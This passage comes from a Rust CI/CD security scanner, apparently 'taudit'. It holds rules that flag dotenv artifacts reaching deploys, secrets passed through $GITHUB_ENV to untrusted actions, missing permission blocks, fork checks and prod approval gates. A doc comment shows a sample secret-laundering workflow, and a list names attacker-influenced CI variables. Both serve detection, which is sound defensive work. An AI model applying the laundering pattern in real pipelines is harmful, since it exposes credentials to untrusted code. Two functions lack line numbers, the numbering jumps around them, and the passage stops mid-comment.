5861            " (producer script reads attacker-influenced CI variables — branch/MR-source names propagate into the dotenv values)"
5862        } else {
5863            ""
5864        };
5865
5866        let mut nodes_involved = vec![consumer.id];
5867        nodes_involved.extend(matched.iter().map(|(id, _)| *id));
5868
5869        findings.push(Finding {
5870            severity,
5871            category: FindingCategory::DotenvArtifactFlowsToPrivilegedDeployment,
5872            path: None,
5873            nodes_involved,
5874            message: format!(
5875                "Step '{}' consumes a dotenv artifact from upstream job(s) [{}]{}{} — variables defined in the upstream's `artifacts.reports.dotenv` are silently promoted to the pipeline variable namespace, indistinguishable from pipeline-level variables in subsequent jobs",
5876                consumer.name,
5877                producer_names.join(", "),
5878                env_suffix,
5879                trust_suffix
5880            ),
5881            recommendation: Recommendation::Manual {
5882                action: "Treat dotenv outputs as untrusted: pin the producer to a protected branch/tag context only, validate variable values in the consumer before use, and prefer explicit `needs:[…].artifacts: false` plus pipeline-scoped variables for deployment selection. Never let dotenv-promoted values choose service connections, deploy targets, or registry destinations without an allowlist check.".into(),
5883            },
5884            source: FindingSource::BuiltIn,
5885                extras: FindingExtras::default(),
5886});
5887    }
5888
5889    findings
5890}
5891
/// True when an environment (or job) name contains a production marker.
///
/// The name is lower-cased and split into segments on `-` and `/`; it is
/// production-like when any segment is exactly one of `prod`,
/// `production`, `prd` or `live`. Examples that match: `prod`,
/// `production/eu-west-1`, `prod-cluster`, `deploy-prod`,
/// `eu-prod/cluster`. Examples that do not: `product`, `preprod`,
/// `reproduce`, and the empty string.
///
/// Segment matching (rather than fixed prefix/suffix probes) means a
/// marker is recognised regardless of which of the two delimiters sits on
/// either side of it, so `eu-prod/cluster` and `apps/prod-eu` are treated
/// the same as `eu-prod-cluster`.
fn is_production_environment(name: &str) -> bool {
    const TOKENS: &[&str] = &["prod", "production", "prd", "live"];

    // An empty name yields a single empty segment, which matches no token.
    name.to_lowercase()
        .split(|c: char| c == '-' || c == '/')
        .any(|segment| TOKENS.contains(&segment))
}
5917
/// True when `script` mentions a GitLab CI variable whose value can carry
/// attacker-chosen text: branch/ref/tag names, commit message fields, and
/// merge-request source branch, title or description.
///
/// Matching is a case-sensitive substring search, so a listed name also
/// matches when it appears inside a longer identifier.
fn script_uses_attacker_influenced_ci_var(script: &str) -> bool {
    const TAINTED_VARS: [&str; 9] = [
        // Ref-derived names.
        "CI_COMMIT_REF_NAME",
        "CI_COMMIT_BRANCH",
        "CI_COMMIT_TAG",
        // Commit message fields.
        "CI_COMMIT_MESSAGE",
        "CI_COMMIT_TITLE",
        "CI_COMMIT_DESCRIPTION",
        // Merge-request fields.
        "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
        "CI_MERGE_REQUEST_TITLE",
        "CI_MERGE_REQUEST_DESCRIPTION",
    ];

    for var in TAINTED_VARS.iter() {
        if script.contains(*var) {
            return true;
        }
    }
    false
}
5934
5935/// Rule: secret laundered through `$GITHUB_ENV` reaches an untrusted consumer
5936/// in the same job — composition gap between `self_mutating_pipeline` (the
5937/// gate-write detector) and `untrusted_with_authority` (the direct-access
5938/// detector).
5939///
5940/// **Pattern (R2 attack #3):**
5941/// ```yaml
5942/// jobs:
5943///   build:
5944///     steps:
5945///       - name: setup
5946///         run: echo "CLOUD_KEY=${{ secrets.CLOUD_KEY }}" >> $GITHUB_ENV   # writer
5947///       - uses: some-org/deploy@main                                        # untrusted
5948///         with:
5949///           key: ${{ env.CLOUD_KEY }}                                       # consumer
5950/// ```
5951/// The writer trips `self_mutating_pipeline`. The consumer never gets a
5952/// `HasAccessTo` edge to `CLOUD_KEY` (the value is sourced from the runner
5953/// env, not the secrets store) so neither `untrusted_with_authority` nor
5954/// `authority_propagation` fire — the env-gate launders the trust zone.
5955///
5956/// **Detection:** for every Step in the same job:
5957///   - Writer: `META_WRITES_ENV_GATE = "true"` AND has `HasAccessTo` to a
5958///     Secret/Identity (the value being laundered must derive from authority)
5959///   - Consumer: appears later in the job (NodeId order tracks declaration
5960///     order), trust zone is `Untrusted` or `ThirdParty`, and carries
5961///     `META_READS_ENV = "true"` (stamped by the parser when the step
5962///     references `${{ env.X }}` in `with:` / `run:`)
5963///
5964/// Same-job constraint enforced via `META_JOB_NAME` — the env gate only
5965/// propagates within a job, so cross-job pairs are not flagged.
5966pub fn secret_via_env_gate_to_untrusted_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
5967    let mut findings = Vec::new();
5968
5969    // Step 1: enumerate writer-with-secret nodes, paired with the laundered
5970    // authority names so the finding message can name them. We capture the
5971    // node id in declaration order so the same-job ordering check below is a
5972    // simple comparison rather than an O(n²) scan.
5973    struct Writer<'a> {
5974        id: NodeId,
5975        job: &'a str,
5976        name: &'a str,
5977        secrets: Vec<&'a str>,
5978    }
5979    let writers: Vec<Writer<'_>> = graph
5980        .nodes_of_kind(NodeKind::Step)
5981        .filter(|step| {
5982            step.metadata
5983                .get(META_WRITES_ENV_GATE)
5984                .map(|v| v == "true")
5985                .unwrap_or(false)
5986        })
5987        .filter_map(|step| {
5988            let job = step.metadata.get(META_JOB_NAME)?.as_str();
5989            // Must hold authority — collect Secret/Identity names reachable
5990            // via HasAccessTo. An env-gate write that doesn't carry any
5991            // authority is the harmless "ECHO ROUTE=/api >> $GITHUB_ENV"
5992            // case; not in scope for this rule.
5993            let secrets: Vec<&str> = graph
5994                .edges_from(step.id)
5995                .filter(|e| e.kind == EdgeKind::HasAccessTo)
5996                .filter_map(|e| graph.node(e.to))
5997                .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
5998                .map(|n| n.name.as_str())
5999                .collect();
6000            if secrets.is_empty() {
6001                return None;
6002            }
6003            Some(Writer {
6004                id: step.id,
6005                job,
6006                name: step.name.as_str(),
6007                secrets,
6008            })
6009        })
6010        .collect();
6011
6012    if writers.is_empty() {
6013        return findings;
6014    }
6015
6016    // Step 2: for every consumer step that reads env, find the writer(s) it
6017    // could be laundering from.
6018    for consumer in graph.nodes_of_kind(NodeKind::Step) {
6019        // Consumer must read the runner env.
6020        let reads_env = consumer
6021            .metadata
6022            .get(META_READS_ENV)
6023            .map(|v| v == "true")
6024            .unwrap_or(false);
6025        if !reads_env {
6026            continue;
6027        }
6028
6029        // Consumer must run with reduced trust — first-party readers are
6030        // already accounted for elsewhere and would be a high-FP class.
6031        if !matches!(
6032            consumer.trust_zone,
6033            TrustZone::Untrusted | TrustZone::ThirdParty
6034        ) {
6035            continue;
6036        }
6037
6038        let consumer_job = match consumer.metadata.get(META_JOB_NAME) {
6039            Some(j) => j.as_str(),
6040            None => continue,
6041        };
6042
6043        // Find writers in the same job that appear earlier (NodeId order
6044        // mirrors declaration order — see GHA parser, ADO parser).
6045        let upstream: Vec<&Writer<'_>> = writers
6046            .iter()
6047            .filter(|w| w.job == consumer_job && w.id < consumer.id)
6048            .collect();
6049
6050        if upstream.is_empty() {
6051            continue;
6052        }
6053
6054        // Aggregate the laundered authority names across all writers so
6055        // operators see the full set of credentials potentially reaching
6056        // the untrusted step. Stable ordering, dedup'd.
6057        let mut secret_labels: Vec<&str> = upstream
6058            .iter()
6059            .flat_map(|w| w.secrets.iter().copied())
6060            .collect();
6061        secret_labels.sort_unstable();
6062        secret_labels.dedup();
6063        let writer_names: Vec<&str> = upstream.iter().map(|w| w.name).collect();
6064
6065        let mut nodes_involved = vec![consumer.id];
6066        nodes_involved.extend(upstream.iter().map(|w| w.id));
6067        // Include the laundered Secret/Identity nodes themselves so the
6068        // fingerprint and downstream consumers can attribute the finding
6069        // to a specific credential.
6070        for w in &upstream {
6071            for e in graph.edges_from(w.id) {
6072                if e.kind == EdgeKind::HasAccessTo
6073                    && graph
6074                        .node(e.to)
6075                        .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6076                        .unwrap_or(false)
6077                    && !nodes_involved.contains(&e.to)
6078                {
6079                    nodes_involved.push(e.to);
6080                }
6081            }
6082        }
6083
6084        findings.push(Finding {
6085            severity: Severity::Critical,
6086            category: FindingCategory::SecretViaEnvGateToUntrustedConsumer,
6087            path: None,
6088            nodes_involved,
6089            message: format!(
6090                "Untrusted consumer '{}' in job '{}' reads from $GITHUB_ENV after step(s) [{}] laundered authority [{}] through the env gate — secret reaches untrusted code without ever appearing in a HasAccessTo edge",
6091                consumer.name,
6092                consumer_job,
6093                writer_names.join(", "),
6094                secret_labels.join(", "),
6095            ),
6096            recommendation: Recommendation::Manual {
6097                action: "Pass the secret to the consuming step via an explicit `env:` mapping on that step (so the relationship is graph-visible) instead of writing it to `$GITHUB_ENV` for ambient pickup. If the consumer is a third-party action, pin it to a 40-char SHA before exposing any secret-derived value to it.".into(),
6098            },
6099            source: FindingSource::BuiltIn,
6100            extras: FindingExtras::default(),
6101        });
6102    }
6103
6104    findings
6105}
6106
6107// ── Positive invariants (negative-space rules) ───────────────────
6108//
6109// These rules fire on the ABSENCE of an expected defensive control rather
6110// than on the presence of a misconfigured one. They are derived from the
6111// blue-team corpus defense report — patterns observed across thousands of
6112// pipelines where the well-defended workflows had a control the others were
6113// missing.
6114//
6115// Each function gates strictly on `META_PLATFORM` so a single pipeline file
6116// is only evaluated by the rules that apply to its source platform.
6117
6118/// Returns true when a graph belongs to the named platform. Falls back to
6119/// false (rule no-ops) when no platform stamp is present — keeps existing
6120/// hand-built test graphs from accidentally tripping platform-scoped rules.
6121fn graph_is_platform(graph: &AuthorityGraph, platform: &str) -> bool {
6122    graph
6123        .metadata
6124        .get(META_PLATFORM)
6125        .map(|p| p == platform)
6126        .unwrap_or(false)
6127}
6128
6129/// Rule: GHA workflow declares no top-level `permissions:` block AND no
6130/// per-job permissions block. With nothing declared, `GITHUB_TOKEN` falls
6131/// back to the broad platform default (`contents: write`, `packages: write`,
6132/// metadata read, etc.) on every trigger. Explicit declarations make the
6133/// blast radius legible to the next reviewer; absence makes it invisible.
6134///
6135/// Detection:
6136///   * `META_PLATFORM == "github-actions"` (gates ADO/GitLab out)
6137///   * Graph carries `META_NO_WORKFLOW_PERMISSIONS == "true"` (parser-set
6138///     when `workflow.permissions` is absent)
6139///   * No Identity node whose name starts with `GITHUB_TOKEN (` (those are
6140///     the per-job override identities the parser creates when a job
6141///     declares its own permissions block)
6142///
6143/// Severity: Medium. Not a direct exploit path on its own but compounds
6144/// every other finding in the same workflow.
6145pub fn no_workflow_level_permissions_block(graph: &AuthorityGraph) -> Vec<Finding> {
6146    if !graph_is_platform(graph, "github-actions") {
6147        return Vec::new();
6148    }
6149    let no_workflow_perms = graph
6150        .metadata
6151        .get(META_NO_WORKFLOW_PERMISSIONS)
6152        .map(|v| v == "true")
6153        .unwrap_or(false);
6154    if !no_workflow_perms {
6155        return Vec::new();
6156    }
6157    // Empty graphs (variable-only YAML files mis-detected as GHA, parse
6158    // failures that left the graph empty, etc.) carry no real authority
6159    // surface to be over-broad over. Skip them. A real workflow always
6160    // produces at least one Step node.
6161    if graph.nodes_of_kind(NodeKind::Step).next().is_none() {
6162        return Vec::new();
6163    }
6164    // Per-job permissions blocks create Identity nodes named
6165    // `GITHUB_TOKEN (<job_name>)`. If any exists, the workflow has at least
6166    // one job-scoped permissions block — don't fire.
6167    let has_job_level_perms = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
6168        n.name.starts_with("GITHUB_TOKEN (")
6169            || (n.name == "GITHUB_TOKEN" && n.metadata.contains_key(META_PERMISSIONS))
6170    });
6171    if has_job_level_perms {
6172        return Vec::new();
6173    }
6174    vec![Finding {
6175        severity: Severity::Medium,
6176        category: FindingCategory::NoWorkflowLevelPermissionsBlock,
6177        path: None,
6178        nodes_involved: Vec::new(),
6179        message: "Workflow declares no top-level or per-job `permissions:` block — GITHUB_TOKEN \
6180             falls back to the broad platform default (contents: write, packages: write, …) \
6181             on every trigger. Explicit permissions make the blast radius legible to triage."
6182            .into(),
6183        recommendation: Recommendation::ReducePermissions {
6184            current: "platform default (broad)".into(),
6185            minimum: "permissions: {} at top level, then add the minimum per-job — e.g. \
6186                      `permissions: { contents: read }`"
6187                .into(),
6188        },
6189        source: FindingSource::BuiltIn,
6190        extras: FindingExtras::default(),
6191    }]
6192}
6193
6194/// Rule: ADO job referencing a production-named service connection has no
6195/// `environment:` binding. Strictly broader than
6196/// `terraform_auto_approve_in_prod` — fires on any prod-SC step (Terraform,
6197/// ARM, AzureCLI, AzurePowerShell, custom) whose enclosing job lacks the
6198/// approval gate, regardless of whether `-auto-approve` is set.
6199///
6200/// Detection (per Step):
6201///   * `META_PLATFORM == "azure-devops"`
6202///   * Step carries `META_SERVICE_CONNECTION_NAME` matching prod pattern,
6203///     OR an `Identity` connected via `HasAccessTo` whose name matches
6204///     the same pattern AND carries `META_SERVICE_CONNECTION == "true"`.
6205///   * Step does NOT carry `META_ENV_APPROVAL` (parser tags every step
6206///     inside an environment-bound deployment job).
6207///
6208/// One finding per matching step (matching `terraform_auto_approve_in_prod`
6209/// granularity). Severity: High.
6210pub fn prod_deploy_job_no_environment_gate(graph: &AuthorityGraph) -> Vec<Finding> {
6211    if !graph_is_platform(graph, "azure-devops") {
6212        return Vec::new();
6213    }
6214    let mut findings = Vec::new();
6215    for step in graph.nodes_of_kind(NodeKind::Step) {
6216        let env_gated = step
6217            .metadata
6218            .get(META_ENV_APPROVAL)
6219            .map(|v| v == "true")
6220            .unwrap_or(false);
6221        if env_gated {
6222            continue;
6223        }
6224        let direct = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
6225        let edge_conn = graph
6226            .edges_from(step.id)
6227            .filter(|e| e.kind == EdgeKind::HasAccessTo)
6228            .filter_map(|e| graph.node(e.to))
6229            .find(|n| {
6230                n.kind == NodeKind::Identity
6231                    && n.metadata
6232                        .get(META_SERVICE_CONNECTION)
6233                        .map(|v| v == "true")
6234                        .unwrap_or(false)
6235            })
6236            .map(|n| n.name.clone());
6237        let conn_name = match direct.or(edge_conn) {
6238            Some(n) if looks_like_prod_connection(&n) => n,
6239            _ => continue,
6240        };
6241        findings.push(Finding {
6242            severity: Severity::High,
6243            category: FindingCategory::ProdDeployJobNoEnvironmentGate,
6244            path: None,
6245            nodes_involved: vec![step.id],
6246            message: format!(
6247                "Step '{}' targets production service connection '{}' but its job has no \
6248                 `environment:` binding — every pipeline trigger applies changes with no \
6249                 approval queue and no entry in the ADO Environments audit trail",
6250                step.name, conn_name
6251            ),
6252            recommendation: Recommendation::Manual {
6253                action: "Move the step into a deployment job whose `environment:` is configured \
6254                         with required approvers in ADO. Even if `-auto-approve` is acceptable \
6255                         (e.g. `terraform apply tfplan`), the environment binding gives the \
6256                         platform a chokepoint for approvals, audit, and concurrency limits."
6257                    .into(),
6258            },
6259            source: FindingSource::BuiltIn,
6260            extras: FindingExtras::default(),
6261        });
6262    }
6263    findings
6264}
6265
6266/// Rule: long-lived static credential in scope but the graph has no OIDC
6267/// identity. Advisory uplift on top of `long_lived_credential` that wires
6268/// the existing `Recommendation::FederateIdentity` variant — emits one Info
6269/// finding per static credential whose name suggests a cloud provider that
6270/// supports OIDC (AWS / GCP / Azure).
6271///
6272/// Heuristic: AWS / GCP / Azure tokens usually carry the provider name in
6273/// the variable identifier (`AWS_*`, `GCP_*`, `GCLOUD_*`, `GOOGLE_*`,
6274/// `AZURE_*`, `ARM_*`). When such a name appears AND no OIDC identity
6275/// exists in the graph, the migration to federation is the actionable
6276/// remediation. The recommendation enum has carried `FederateIdentity` for
6277/// two releases without any rule emitting it.
6278///
6279/// Severity: Info (advisory). The underlying credential is already flagged
6280/// at higher severity by `long_lived_credential`.
6281pub fn long_lived_secret_without_oidc_recommendation(graph: &AuthorityGraph) -> Vec<Finding> {
6282    // Skip if any OIDC identity already exists — the workflow is already on
6283    // a federated path; the static credential it carries is presumably a
6284    // legacy artifact unrelated to the OIDC integration.
6285    let has_oidc = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
6286        n.metadata
6287            .get(META_OIDC)
6288            .map(|v| v == "true")
6289            .unwrap_or(false)
6290    });
6291    if has_oidc {
6292        return Vec::new();
6293    }
6294    let mut findings = Vec::new();
6295    for secret in graph.nodes_of_kind(NodeKind::Secret) {
6296        let upper = secret.name.to_uppercase();
6297        let provider: Option<(&str, &str)> = if upper.starts_with("AWS_")
6298            || upper.contains("AWS_ACCESS_KEY")
6299            || upper.contains("AWS_SECRET")
6300        {
6301            Some(("AWS", "GitHub Actions OIDC + sts:AssumeRoleWithWebIdentity (id-token: write + aws-actions/configure-aws-credentials)"))
6302        } else if upper.starts_with("GCP_")
6303            || upper.starts_with("GCLOUD_")
6304            || upper.starts_with("GOOGLE_")
6305            || upper.contains("GCP_SERVICE_ACCOUNT")
6306            || upper.contains("GOOGLE_CREDENTIALS")
6307        {
6308            Some(("GCP", "GCP Workload Identity Federation (google-github-actions/auth with workload_identity_provider)"))
6309        } else if upper.starts_with("AZURE_")
6310            || upper.starts_with("ARM_")
6311            || upper.contains("AZURE_CLIENT_SECRET")
6312        {
6313            Some((
6314                "Azure",
6315                "Azure federated credential (azure/login with client-id, no client-secret)",
6316            ))
6317        } else {
6318            None
6319        };
6320        let Some((cloud, oidc_provider)) = provider else {
6321            continue;
6322        };
6323        findings.push(Finding {
6324            severity: Severity::Info,
6325            category: FindingCategory::LongLivedSecretWithoutOidcRecommendation,
6326            path: None,
6327            nodes_involved: vec![secret.id],
6328            message: format!(
6329                "Long-lived {cloud} credential '{}' is in scope and no OIDC identity exists \
6330                 in this workflow — {cloud} supports OIDC federation, so this credential could \
6331                 be replaced with a short-lived token issued at runtime",
6332                secret.name
6333            ),
6334            recommendation: Recommendation::FederateIdentity {
6335                static_secret: secret.name.clone(),
6336                oidc_provider: oidc_provider.into(),
6337            },
6338            source: FindingSource::BuiltIn,
6339            extras: FindingExtras::default(),
6340        });
6341    }
6342    findings
6343}
6344
6345/// Rule: GHA workflow with multiple privileged jobs where SOME steps carry
6346/// the standard fork-check `if:` and OTHERS do not — intra-file
6347/// inconsistency in defensive posture. The org has the right instinct
6348/// (some jobs are guarded) but applied it unevenly. Surfaces the unguarded
6349/// privileged jobs by name so a reviewer can fix the gap in one PR.
6350///
6351/// Detection:
6352///   * `META_PLATFORM == "github-actions"`
6353///   * Trigger contains `pull_request` or `pull_request_target`
6354///   * Multiple jobs hold authority (steps with `HasAccessTo` to a Secret
6355///     or Identity)
6356///   * At least one such job's privileged steps ALL carry
6357///     `META_FORK_CHECK == "true"`
6358///   * AND at least one OTHER privileged job has NO step carrying that
6359///     marker
6360///
6361/// Severity: High. Severity floors at Medium when the inconsistency is
6362/// limited to a single unguarded job (one-off oversight) vs. multiple
6363/// (systemic gap).
6364pub fn pull_request_workflow_inconsistent_fork_check(graph: &AuthorityGraph) -> Vec<Finding> {
6365    if !graph_is_platform(graph, "github-actions") {
6366        return Vec::new();
6367    }
6368    let trigger = match graph.metadata.get(META_TRIGGER) {
6369        Some(t) => t.as_str(),
6370        None => return Vec::new(),
6371    };
6372    let in_pr_context = trigger.split(',').any(|t| {
6373        let t = t.trim();
6374        matches!(t, "pull_request" | "pull_request_target")
6375    });
6376    if !in_pr_context {
6377        return Vec::new();
6378    }
6379
6380    // For each privileged step, record (job_name, has_fork_check). A job is
6381    // "guarded" iff every privileged step in it carries the marker.
6382    use std::collections::BTreeMap;
6383    let mut per_job: BTreeMap<String, (bool, bool)> = BTreeMap::new(); // job -> (any_guarded, any_unguarded)
6384
6385    for step in graph.nodes_of_kind(NodeKind::Step) {
6386        let holds_authority = graph.edges_from(step.id).any(|e| {
6387            e.kind == EdgeKind::HasAccessTo
6388                && graph
6389                    .node(e.to)
6390                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6391                    .unwrap_or(false)
6392        });
6393        if !holds_authority {
6394            continue;
6395        }
6396        let job = step
6397            .metadata
6398            .get(META_JOB_NAME)
6399            .cloned()
6400            .unwrap_or_else(|| step.name.clone());
6401        let guarded = step
6402            .metadata
6403            .get(META_FORK_CHECK)
6404            .map(|v| v == "true")
6405            .unwrap_or(false);
6406        let entry = per_job.entry(job).or_insert((false, false));
6407        if guarded {
6408            entry.0 = true;
6409        } else {
6410            entry.1 = true;
6411        }
6412    }
6413
6414    // Need >= 2 distinct privileged jobs; >= 1 fully-guarded job and >= 1
6415    // job with at least one unguarded privileged step.
6416    if per_job.len() < 2 {
6417        return Vec::new();
6418    }
6419    let fully_guarded: Vec<&String> = per_job
6420        .iter()
6421        .filter(|(_, (g, u))| *g && !*u)
6422        .map(|(k, _)| k)
6423        .collect();
6424    let unguarded: Vec<&String> = per_job
6425        .iter()
6426        .filter(|(_, (_, u))| *u)
6427        .map(|(k, _)| k)
6428        .collect();
6429    if fully_guarded.is_empty() || unguarded.is_empty() {
6430        return Vec::new();
6431    }
6432    let severity = if unguarded.len() >= 2 {
6433        Severity::High
6434    } else {
6435        Severity::Medium
6436    };
6437    let guarded_label = fully_guarded
6438        .iter()
6439        .map(|s| s.as_str())
6440        .collect::<Vec<_>>()
6441        .join(", ");
6442    let unguarded_label = unguarded
6443        .iter()
6444        .map(|s| s.as_str())
6445        .collect::<Vec<_>>()
6446        .join(", ");
6447    vec![Finding {
6448        severity,
6449        category: FindingCategory::PullRequestWorkflowInconsistentForkCheck,
6450        path: None,
6451        nodes_involved: Vec::new(),
6452        message: format!(
6453            "PR-triggered workflow ('{trigger}') applies the standard fork-check \
6454             (`github.event.pull_request.head.repo.fork == false` or equivalent) on \
6455             privileged jobs [{guarded_label}] but NOT on [{unguarded_label}] — the \
6456             unguarded jobs hold authority that fork PRs can reach"
6457        ),
6458        recommendation: Recommendation::Manual {
6459            action: format!(
6460                "Add `if: github.event.pull_request.head.repo.fork == false` (or \
6461                 `github.event.pull_request.head.repo.full_name == github.repository`) to the \
6462                 privileged steps in [{unguarded_label}]. Match the pattern already used by \
6463                 [{guarded_label}] in the same workflow."
6464            ),
6465        },
6466        source: FindingSource::BuiltIn,
6467        extras: FindingExtras::default(),
6468    }]
6469}
6470
6471/// Rule: GitLab job with a production-named `environment:` binding has no
6472/// `rules:` / `only:` clause restricting it to protected branches. The job
6473/// runs (or attempts to run) on every pipeline trigger; if branch
6474/// protection is later relaxed the deploy becomes runnable from
6475/// unprotected branches without any code change.
6476///
6477/// Detection (per Step in a GitLab graph):
6478///   * `META_PLATFORM == "gitlab"`
6479///   * Step carries `environment_name` matching a production token
6480///     (`prod`, `production`, `prd`)
6481///   * Step does NOT carry `META_RULES_PROTECTED_ONLY`
6482///
6483/// Severity: Medium.
6484pub fn gitlab_deploy_job_missing_protected_branch_only(graph: &AuthorityGraph) -> Vec<Finding> {
6485    if !graph_is_platform(graph, "gitlab") {
6486        return Vec::new();
6487    }
6488    let mut findings = Vec::new();
6489    for step in graph.nodes_of_kind(NodeKind::Step) {
6490        let env_name = match step.metadata.get("environment_name") {
6491            Some(n) => n.clone(),
6492            None => continue,
6493        };
6494        if !looks_like_prod_connection(&env_name) {
6495            continue;
6496        }
6497        let protected = step
6498            .metadata
6499            .get(META_RULES_PROTECTED_ONLY)
6500            .map(|v| v == "true")
6501            .unwrap_or(false);
6502        if protected {
6503            continue;
6504        }
6505        findings.push(Finding {
6506            severity: Severity::Medium,
6507            category: FindingCategory::GitlabDeployJobMissingProtectedBranchOnly,
6508            path: None,
6509            nodes_involved: vec![step.id],
6510            message: format!(
6511                "GitLab deploy job '{}' targets production environment '{}' but has no \
6512                 `rules:` / `only:` clause restricting it to protected branches — every MR \
6513                 and every push will attempt to run the deploy",
6514                step.name, env_name
6515            ),
6516            recommendation: Recommendation::Manual {
6517                action: "Add `rules: - if: '$CI_COMMIT_REF_PROTECTED == \"true\"'` to the job, \
6518                         or `only: [main]` for the simplest case. This survives future \
6519                         changes to branch-protection settings."
6520                    .into(),
6521            },
6522            source: FindingSource::BuiltIn,
6523            extras: FindingExtras::default(),
6524        });
6525    }
6526    findings
6527}
6528
6529// ── Compensating-control suppressions ────────────────────────
6530//
6531// These suppressions DOWNGRADE or REMOVE existing-rule findings when the
6532// graph carries a control that neutralises (or substantially mitigates)
6533// the underlying risk. Applied as a post-processing pass so each
6534// suppression can see both the finding and the surrounding graph state.
6535//
6536// Design intent (from the blue-team corpus defense report):
6537//   * downgrade > suppress: keep the finding visible at a lower severity
6538//     so it still surfaces in audits, but stop competing for triage time
6539//     with un-mitigated criticals
6540//   * never *delete* a finding silently — every suppression appends an
6541//     explanation suffix to the message describing the compensating
6542//     control taudit credited
6543//
6544// Suppressions implemented here:
6545//   1. `checkout_self_pr_exposure` downgraded when the same job has no
6546//      privileged steps (no Secret/Identity access and no env-gate writes).
6547//   2. `trigger_context_mismatch` downgraded when every privileged step
6548//      in the workflow carries the standard fork-check `if:`.
6549//   3. `over_privileged_identity` suppressed when the workflow-level
6550//      identity is broad but at least one job-level override narrows the
6551//      scope (job-level wins at runtime).
6552//   4. `terraform_auto_approve_in_prod` downgraded — not skipped — when an
6553//      `environment:` gate is present (replaces the previous early-skip
6554//      which discarded the finding entirely).
6555fn apply_compensating_controls(graph: &AuthorityGraph, findings: &mut [Finding]) {
6556    // Pre-compute graph-level signals once so the per-finding loop stays
6557    // O(N findings) rather than O(N findings × M nodes).
6558    let mut all_authority_steps_have_fork_check = true;
6559    let mut any_authority_step_seen = false;
6560    for step in graph.nodes_of_kind(NodeKind::Step) {
6561        let holds_authority = graph.edges_from(step.id).any(|e| {
6562            e.kind == EdgeKind::HasAccessTo
6563                && graph
6564                    .node(e.to)
6565                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6566                    .unwrap_or(false)
6567        });
6568        if !holds_authority {
6569            continue;
6570        }
6571        any_authority_step_seen = true;
6572        let guarded = step
6573            .metadata
6574            .get(META_FORK_CHECK)
6575            .map(|v| v == "true")
6576            .unwrap_or(false);
6577        if !guarded {
6578            all_authority_steps_have_fork_check = false;
6579        }
6580    }
6581    let fork_check_universal = any_authority_step_seen && all_authority_steps_have_fork_check;
6582
6583    // For Suppression 1, build per-job: does any step in the job have
6584    // access to a Secret/Identity OR write to the env gate?
6585    use std::collections::{BTreeMap, BTreeSet};
6586    let mut job_has_privileged_step: BTreeMap<String, bool> = BTreeMap::new();
6587    for step in graph.nodes_of_kind(NodeKind::Step) {
6588        let job = match step.metadata.get(META_JOB_NAME) {
6589            Some(j) => j.clone(),
6590            None => continue,
6591        };
6592        let privileged = graph.edges_from(step.id).any(|e| {
6593            e.kind == EdgeKind::HasAccessTo
6594                && graph
6595                    .node(e.to)
6596                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6597                    .unwrap_or(false)
6598        }) || step
6599            .metadata
6600            .get(META_WRITES_ENV_GATE)
6601            .map(|v| v == "true")
6602            .unwrap_or(false);
6603        let entry = job_has_privileged_step.entry(job).or_insert(false);
6604        if privileged {
6605            *entry = true;
6606        }
6607    }
6608
6609    // For Suppression 3 — over_privileged_identity — collect the names of
6610    // narrower per-job identity overrides so we can credit them when the
6611    // broad workflow-level identity fires.
6612    let job_level_narrow_overrides: BTreeSet<String> = graph
6613        .nodes_of_kind(NodeKind::Identity)
6614        .filter(|n| {
6615            n.name.starts_with("GITHUB_TOKEN (")
6616                && n.metadata
6617                    .get(META_IDENTITY_SCOPE)
6618                    .map(|s| s == "constrained")
6619                    .unwrap_or(false)
6620        })
6621        .map(|n| n.name.clone())
6622        .collect();
6623
6624    for finding in findings.iter_mut() {
6625        match finding.category {
6626            // ── Suppression 1: checkout_self_pr_exposure
6627            FindingCategory::CheckoutSelfPrExposure => {
6628                // Identify the checkout step (first node in nodes_involved)
6629                // and look up its job. If the job has no privileged steps,
6630                // the checkout is read-only — downgrade to Info.
6631                let job = finding
6632                    .nodes_involved
6633                    .first()
6634                    .and_then(|id| graph.node(*id))
6635                    .and_then(|n| n.metadata.get(META_JOB_NAME).cloned());
6636                let job_privileged = job
6637                    .as_ref()
6638                    .and_then(|j| job_has_privileged_step.get(j).copied())
6639                    .unwrap_or(true); // unknown → conservative: keep High
6640                if !job_privileged {
6641                    finding.severity = Severity::Info;
6642                    finding.message.push_str(
6643                        " (downgraded: no privileged steps in same job — \
6644                                   checkout is read-only for lint/test/analysis)",
6645                    );
6646                }
6647            }
6648            // ── Suppression 2: trigger_context_mismatch
6649            FindingCategory::TriggerContextMismatch => {
6650                if fork_check_universal {
6651                    // Critical → Medium (not Info — the trigger choice itself
6652                    // is still risky enough to keep visible for audit).
6653                    finding.severity = match finding.severity {
6654                        Severity::Critical => Severity::Medium,
6655                        s => downgrade_one_step(s),
6656                    };
6657                    finding.message.push_str(
6658                        " (downgraded: every privileged job in this workflow carries the \
6659                         standard fork-check `if:` — fork PRs cannot reach the privileged steps)",
6660                    );
6661                }
6662            }
6663            // ── Suppression 3: over_privileged_identity
6664            FindingCategory::OverPrivilegedIdentity => {
6665                // Only relevant when the firing identity IS the
6666                // workflow-level GITHUB_TOKEN AND at least one job has its
6667                // own narrower override.
6668                let firing_node_name = finding
6669                    .nodes_involved
6670                    .first()
6671                    .and_then(|id| graph.node(*id))
6672                    .map(|n| n.name.clone());
6673                let is_workflow_level_token = firing_node_name.as_deref() == Some("GITHUB_TOKEN");
6674                if is_workflow_level_token && !job_level_narrow_overrides.is_empty() {
6675                    // Suppress by reducing to Info — the runtime identity
6676                    // any job actually uses is the narrower job-level one.
6677                    finding.severity = Severity::Info;
6678                    let mut narrower: Vec<&str> = job_level_narrow_overrides
6679                        .iter()
6680                        .map(|s| s.as_str())
6681                        .collect();
6682                    narrower.sort_unstable();
6683                    finding.message.push_str(&format!(
6684                        " (suppressed: job-level permissions narrow this scope at runtime — \
6685                         see {})",
6686                        narrower.join(", ")
6687                    ));
6688                }
6689            }
6690            // ── Suppression 4: terraform_auto_approve_in_prod
6691            //
6692            // The pre-existing rule already early-skipped
6693            // env-gated steps, so it never emits a finding to downgrade.
